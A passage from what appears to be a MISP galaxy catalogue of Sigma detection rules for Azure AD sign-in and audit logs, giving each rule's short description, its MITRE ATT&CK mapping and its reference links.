https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_unusual_authentication_interruption.yml

Application Using Device Code Authentication Flow

Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments. If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted. This can be a misconfigured application or potentially something malicious.

The tag is: misp-galaxy:sigma-rules="Application Using Device Code Authentication Flow"

Application Using Device Code Authentication Flow has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11289. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_app_device_code_authentication.yml

Account Disabled or Blocked for Sign in Attempts

Detects when an account is disabled or blocked for sign in but tried to log in

The tag is: misp-galaxy:sigma-rules="Account Disabled or Blocked for Sign in Attempts"

Account Disabled or Blocked for Sign in Attempts has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11290. Table References

Links

https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_blocked_account_attempt.yml

Password Spray Activity

Indicates that a password spray attack has been successfully performed.

The tag is: misp-galaxy:sigma-rules="Password Spray Activity"

Password Spray Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 11291. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#password-spray

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_password_spray.yml

Suspicious Inbox Manipulation Rules

Detects suspicious rules that delete or move messages or folders are set on a user’s inbox.

The tag is: misp-galaxy:sigma-rules="Suspicious Inbox Manipulation Rules"

Suspicious Inbox Manipulation Rules has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 11292. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#suspicious-inbox-manipulation-rules

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_inbox_manipulation.yml

Anonymous IP Address

Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN.

The tag is: misp-galaxy:sigma-rules="Anonymous IP Address"

Anonymous IP Address has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

Table 11293. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#anonymous-ip-address

https://learn.microsoft.com/en-us/graph/api/resources/riskdetection?view=graph-rest-1.0

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_anonymous_ip_address.yml

New Country

Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.

The tag is: misp-galaxy:sigma-rules="New Country"

New Country has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11294. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#new-country

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_new_coutry_region.yml

Suspicious Inbox Forwarding Identity Protection

Indicates suspicious rules such as an inbox rule that forwards a copy of all emails to an external address

The tag is: misp-galaxy:sigma-rules="Suspicious Inbox Forwarding Identity Protection"

Suspicious Inbox Forwarding Identity Protection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 11295. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#suspicious-inbox-forwarding

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_inbox_forwarding_rule.yml

Atypical Travel

Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.

The tag is: misp-galaxy:sigma-rules="Atypical Travel"

Atypical Travel has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11296. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#atypical-travel

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_atypical_travel.yml

Primary Refresh Token Access Attempt

Indicates access attempt to the PRT resource which can be used to move laterally into an organization or perform credential theft

The tag is: misp-galaxy:sigma-rules="Primary Refresh Token Access Attempt"

Primary Refresh Token Access Attempt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

Table 11297. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#possible-attempt-to-access-primary-refresh-token-prt

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_prt_access.yml

Sign-In From Malware Infected IP

Indicates sign-ins from IP addresses infected with malware that is known to actively communicate with a bot server.

The tag is: misp-galaxy:sigma-rules="Sign-In From Malware Infected IP"

Sign-In From Malware Infected IP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 11298. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#malware-linked-ip-address-deprecated

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_malware_linked_ip.yml

Malicious IP Address Sign-In Suspicious

Indicates sign-in from a malicious IP address known to be malicious at time of sign-in.

The tag is: misp-galaxy:sigma-rules="Malicious IP Address Sign-In Suspicious"

Malicious IP Address Sign-In Suspicious has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 11299. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#malicious-ip-address

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address_suspicious.yml

Unfamiliar Sign-In Properties

Detects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins.

The tag is: misp-galaxy:sigma-rules="Unfamiliar Sign-In Properties"

Unfamiliar Sign-In Properties has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11300. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#unfamiliar-sign-in-properties

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_unfamilar_sign_in.yml

Malicious IP Address Sign-In Failure Rate

Indicates sign-in from a malicious IP address based on high failure rates.

The tag is: misp-galaxy:sigma-rules="Malicious IP Address Sign-In Failure Rate"

Malicious IP Address Sign-In Failure Rate has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 11301. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#malicious-ip-address

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address.yml

SAML Token Issuer Anomaly

Indicates the SAML token issuer for the associated SAML token is potentially compromised. The claims included in the token are unusual or match known attacker patterns

The tag is: misp-galaxy:sigma-rules="SAML Token Issuer Anomaly"

SAML Token Issuer Anomaly has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Forge Web Credentials - T1606" with estimative-language:likelihood-probability="almost-certain"

Table 11302. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#token-issuer-anomaly

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_token_issuer_anomaly.yml

Azure AD Account Credential Leaked

Indicates that the user’s valid credentials have been leaked.

The tag is: misp-galaxy:sigma-rules="Azure AD Account Credential Leaked"

Azure AD Account Credential Leaked has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Gather Victim Identity Information - T1589" with estimative-language:likelihood-probability="almost-certain"

Table 11303. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#leaked-credentials

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_leaked_credentials.yml

Anomalous Token

Indicates that there are abnormal characteristics in the token such as an unusual token lifetime or a token that is played from an unfamiliar location.

The tag is: misp-galaxy:sigma-rules="Anomalous Token"

Anomalous Token has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

Table 11304. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#anomalous-token

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_anomalous_token.yml

Azure AD Threat Intelligence

Indicates user activity that is unusual for the user or consistent with known attack patterns.

The tag is: misp-galaxy:sigma-rules="Azure AD Threat Intelligence"

Azure AD Threat Intelligence has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11305. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-sign-in

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-user

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_threat_intel.yml

Activity From Anonymous IP Address

Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address.

The tag is: misp-galaxy:sigma-rules="Activity From Anonymous IP Address"

Activity From Anonymous IP Address has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11306. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#activity-from-anonymous-ip-address

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_anonymous_ip_activity.yml

Impossible Travel

Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.

The tag is: misp-galaxy:sigma-rules="Impossible Travel"

Impossible Travel has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11307. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#impossible-travel

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_impossible_travel.yml

Suspicious Browser Activity

Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser

The tag is: misp-galaxy:sigma-rules="Suspicious Browser Activity"

Suspicious Browser Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11308. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#suspicious-browser

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_suspicious_browser.yml

Anomalous User Activity

Indicates that there are anomalous patterns of behavior like suspicious changes to the directory.

The tag is: misp-galaxy:sigma-rules="Anomalous User Activity"

Anomalous User Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11309. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins

https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#anomalous-user-activity

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_anomalous_user.yml

Detects when an end user consents to an application

The tag is: misp-galaxy:sigma-rules="End User Consent"

End User Consent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

Table 11310. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-consent

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_end_user_consent.yml

App Role Added

Detects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner.

The tag is: misp-galaxy:sigma-rules="App Role Added"

App Role Added has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Additional Cloud Roles - T1098.003" with estimative-language:likelihood-probability="almost-certain"

Table 11311. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#service-principal-assigned-to-a-role

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_role_added.yml

Change to Authentication Method

Change to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access.

The tag is: misp-galaxy:sigma-rules="Change to Authentication Method"

Change to Authentication Method has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11312. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_change_to_authentication_method.yml

Guest User Invited By Non Approved Inviters

Detects when a user that doesn’t have permissions to invite a guest user attempts to invite one.

The tag is: misp-galaxy:sigma-rules="Guest User Invited By Non Approved Inviters"

Guest User Invited By Non Approved Inviters has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11313. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_guest_invite_failure.yml

Temporary Access Pass Added To An Account

Detects when a temporary access pass (TAP) is added to an account. TAPs added to priv accounts should be investigated

The tag is: misp-galaxy:sigma-rules="Temporary Access Pass Added To An Account"

Temporary Access Pass Added To An Account has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11314. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_tap_added.yml

Azure Subscription Permission Elevation Via AuditLogs

Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn’t planned. This setting could allow an attacker access to Azure subscriptions in your environment.

The tag is: misp-galaxy:sigma-rules="Azure Subscription Permission Elevation Via AuditLogs"

Azure Subscription Permission Elevation Via AuditLogs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11315. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#assignment-and-elevation

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_subscription_permissions_elevation_via_auditlogs.yml

Account Created And Deleted Within A Close Time Frame

Detects when an account was created and deleted in a short period of time.

The tag is: misp-galaxy:sigma-rules="Account Created And Deleted Within A Close Time Frame"

Account Created And Deleted Within A Close Time Frame has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11316. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#short-lived-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_ad_account_created_deleted.yml

Bitlocker Key Retrieval

Monitor and alert for Bitlocker key retrieval.

The tag is: misp-galaxy:sigma-rules="Bitlocker Key Retrieval"

Bitlocker Key Retrieval has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11317. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#bitlocker-key-retrieval

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_ad_bitlocker_key_retrieval.yml

Added Owner To Application

Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.

The tag is: misp-galaxy:sigma-rules="Added Owner To Application"

Added Owner To Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"

Table 11318. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#new-owner

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_owner_added.yml

Password Reset By User Account

Detect when a user has reset their password in Azure AD

The tag is: misp-galaxy:sigma-rules="Password Reset By User Account"

Password Reset By User Account has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11319. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_user_password_change.yml

User Added To Group With CA Policy Modification Access

Monitor and alert on group membership additions of groups that have CA policy modification access

The tag is: misp-galaxy:sigma-rules="User Added To Group With CA Policy Modification Access"

User Added To Group With CA Policy Modification Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"

Table 11320. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_group_user_addition_ca_modification.yml

Azure Domain Federation Settings Modified

Identifies when an user or application modified the federation settings on the domain.

The tag is: misp-galaxy:sigma-rules="Azure Domain Federation Settings Modified"

Azure Domain Federation Settings Modified has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11321. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_federation_modified.yml

Added Credentials to Existing Application

Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials.

The tag is: misp-galaxy:sigma-rules="Added Credentials to Existing Application"

Added Credentials to Existing Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Additional Cloud Credentials - T1098.001" with estimative-language:likelihood-probability="almost-certain"

Table 11322. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-credentials

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_credential_added.yml

Bulk Deletion Changes To Privileged Account Permissions

Detects when a user is removed from a privileged role. Bulk changes should be investigated.

The tag is: misp-galaxy:sigma-rules="Bulk Deletion Changes To Privileged Account Permissions"

Bulk Deletion Changes To Privileged Account Permissions has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11323. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_priviledged_role_assignment_bulk_change.yml

User Added To Privilege Role

Detects when a user is added to a privileged role.

The tag is: misp-galaxy:sigma-rules="User Added To Privilege Role"

User Added To Privilege Role has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11324. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_priviledged_role_assignment_add.yml

App Granted Microsoft Permissions

Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD

The tag is: misp-galaxy:sigma-rules="App Granted Microsoft Permissions"

App Granted Microsoft Permissions has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

Table 11325. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_permissions_msft.yml

CA Policy Removed by Non Approved Actor

Monitor and alert on conditional access changes where non approved actor removed CA Policy.

The tag is: misp-galaxy:sigma-rules="CA Policy Removed by Non Approved Actor"

CA Policy Removed by Non Approved Actor has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"

Table 11326. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_aad_secops_ca_policy_removedby_bad_actor.yml

App Granted Privileged Delegated Or App Permissions

Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions

The tag is: misp-galaxy:sigma-rules="App Granted Privileged Delegated Or App Permissions"

App Granted Privileged Delegated Or App Permissions has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Additional Cloud Roles - T1098.003" with estimative-language:likelihood-probability="almost-certain"

Table 11327. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_privileged_permissions.yml

New CA Policy by Non-approved Actor

Monitor and alert on conditional access changes.

The tag is: misp-galaxy:sigma-rules="New CA Policy by Non-approved Actor"

New CA Policy by Non-approved Actor has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

Table 11328. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml

CA Policy Updated by Non Approved Actor

Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? Review Modified Properties and compare "old" vs "new" value.

The tag is: misp-galaxy:sigma-rules="CA Policy Updated by Non Approved Actor"

CA Policy Updated by Non Approved Actor has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"

Table 11329. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_aad_secops_ca_policy_updatedby_bad_actor.yml

Changes To PIM Settings

Detects when changes are made to PIM roles

The tag is: misp-galaxy:sigma-rules="Changes To PIM Settings"

Changes To PIM Settings has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11330. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_pim_change_settings.yml

Users Added to Global or Device Admin Roles

Monitor and alert for users added to device admin roles.

The tag is: misp-galaxy:sigma-rules="Users Added to Global or Device Admin Roles"

Users Added to Global or Device Admin Roles has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11331. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-administrator-roles

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_ad_users_added_to_device_admin_roles.yml

User State Changed From Guest To Member

Detects the change of user type from "Guest" to "Member" for potential elevation of privilege.

The tag is: misp-galaxy:sigma-rules="User State Changed From Guest To Member"

User State Changed From Guest To Member has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11332. Table References

Links

https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_guest_to_member.yml

PIM Alert Setting Changes To Disabled

Detects when PIM alerts are set to disabled.

The tag is: misp-galaxy:sigma-rules="PIM Alert Setting Changes To Disabled"

PIM Alert Setting Changes To Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11333. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_pim_alerts_disabled.yml

Application URI Configuration Changes

Detects when a configuration change is made to an applications URI. URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.

The tag is: misp-galaxy:sigma-rules="Application URI Configuration Changes"

Application URI Configuration Changes has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11334. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-configuration-changes

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_uri_modifications.yml

Application AppID Uri Configuration Changes

Detects when a configuration change is made to an applications AppID URI.

The tag is: misp-galaxy:sigma-rules="Application AppID Uri Configuration Changes"

Application AppID Uri Configuration Changes has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11335. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#appid-uri-added-modified-or-removed

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_appid_uri_changes.yml

Guest Users Invited To Tenant By Non Approved Inviters

Detects guest users being invited to tenant by non-approved inviters

